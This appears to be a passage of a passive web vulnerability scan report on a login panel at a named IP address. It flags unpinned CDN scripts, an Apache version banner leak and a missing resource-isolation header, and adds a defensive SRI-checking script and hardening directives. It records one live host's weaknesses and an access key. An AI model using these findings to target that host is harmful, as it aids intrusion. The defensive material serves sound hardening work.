| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 13 |
| Solution | Load JavaScript only from origins you trust and that end users cannot influence, and pin each cross-origin include with a Subresource Integrity hash plus a crossorigin attribute; none of the three CDN includes quoted in the evidence above carries an integrity attribute. |
| Reference | |
| Tags | OWASP_2021_A08 |
| CWE Id | 829 |
| WASC Id | 15 |
| Plugin Id | 10017 |
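None of the three CDN includes in the evidence carries an `integrity` or `crossorigin` attribute, so a tampered file served from code.jquery.com, cdn.jsdelivr.net or stackpath.bootstrapcdn.com would execute in the panel's origin. The check below is an added example, not the scanner's or the panel's code; the page fragment is constructed from the script tags quoted in the evidence plus one hypothetical same-origin include, and the resource body hashed for the pinned tag is a placeholder rather than the real library.

```python
import base64
import hashlib
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse


class _ScriptTags(HTMLParser):
    """Collects the attributes of every <script src=...> tag in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = {k.lower(): (v or "") for k, v in attrs}
            if a.get("src"):
                self.scripts.append(a)


def unpinned_third_party_scripts(html: str, page_url: str) -> List[str]:
    """Return the src of every cross-origin script that lacks a usable SRI pin."""
    page_host = urlparse(page_url).hostname
    parser = _ScriptTags()
    parser.feed(html)
    flagged: List[str] = []
    for a in parser.scripts:
        host = urlparse(a["src"]).hostname
        if host is None or host == page_host:
            continue  # relative or same-origin include; SRI is optional there
        has_pin = a.get("integrity", "").startswith(("sha256-", "sha384-", "sha512-"))
        # For a cross-origin resource the browser can only verify the hash when CORS
        # lets it read the body, so crossorigin is required alongside integrity.
        cors_ok = a.get("crossorigin", "").lower() in ("anonymous", "use-credentials")
        if not (has_pin and cors_ok):
            flagged.append(a["src"])
    return flagged


def sri_hash(resource: bytes, algo: str = "sha384") -> str:
    """Compute the integrity attribute value for a fetched resource body."""
    digest = hashlib.new(algo, resource).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def pinned_script_tag(src: str, resource: bytes) -> str:
    """Emit the hardened include for a resource whose bytes have been reviewed."""
    return f'<script src="{src}" integrity="{sri_hash(resource)}" crossorigin="anonymous"></script>'


# Constructed fragment: the three includes quoted in the evidence plus a hypothetical local one.
LOGIN_PAGE = """
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
<script src="js/panel.js"></script>
"""

if __name__ == "__main__":
    for src in unpinned_third_party_scripts(LOGIN_PAGE, "http://142.202.242.172/TQUIA729JAULAMJS/login.php"):
        print("unpinned:", src)
    print(pinned_script_tag("https://code.jquery.com/jquery-3.5.1.slim.min.js", b"/* placeholder body */"))
```

Generate the hash from a copy of the library you have reviewed, not from whatever the CDN serves at pin time, and re-run the check after each dependency bump: a changed file with an old pin simply fails to load, which is the intended failure mode.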
| Low | In Page Banner Information Leak |
|---|---|
| Description | The server returned a version banner string in the response content. Such information leaks may allow attackers to further target specific issues impacting the product and version in use. |
| URL | http://142.202.242.172/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 159 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 160 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 165 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 626 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 241 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| Instances | 5 |
| Solution | Configure the server to suppress version banners. Under Tomcat, set the "server" attribute on the Connector and serve custom error pages; under Apache, set the "ServerTokens" and "ServerSignature" directives. |
| Reference | https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/ |
| Tags | OWASP_2021_A05, OWASP_2017_A06, WSTG-v42-INFO-02 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10009 |
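For the two Apache directives named in the solution, an added configuration example that is not part of the scan report or the target's configuration: the first pair is what produces the observed `Apache/2.4.58 ...` footer (the values XAMPP's httpd-default.conf ships with), the second suppresses it.

```apache
# Weak: full version string in the Server header and a signature footer on every
# generated error page, which is what the five instances above matched.
ServerTokens Full
ServerSignature On

# Hardened: the Server header is reduced to "Apache" and error pages carry no footer.
# ServerTokens cannot remove the header entirely; that needs a module such as
# mod_security (SecServerSignature) or a reverse proxy in front of httpd.
ServerTokens Prod
ServerSignature Off
```

After the change, confirm with a request for a nonexistent path (the robots.txt and sitemap.xml instances above are convenient) that the 404 body no longer contains `Apache/` and that the Server header reads only `Apache`.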
| Low | Insufficient Site Isolation Against Spectre Vulnerability |
|---|---|
| Description | Cross-Origin-Resource-Policy is an opt-in response header designed to counter side-channel attacks such as Spectre by letting the browser refuse to load a resource into a cross-origin document. Resources that must be shared across origins should be marked as such explicitly (same-site or cross-origin); everything else should default to same-origin. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | Cross-Origin-Resource-Policy |
| Attack | |
| Evidence | |
| Request Header - size: 574 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 364 bytes. | |
| Response Body - size: 97,496 bytes. | |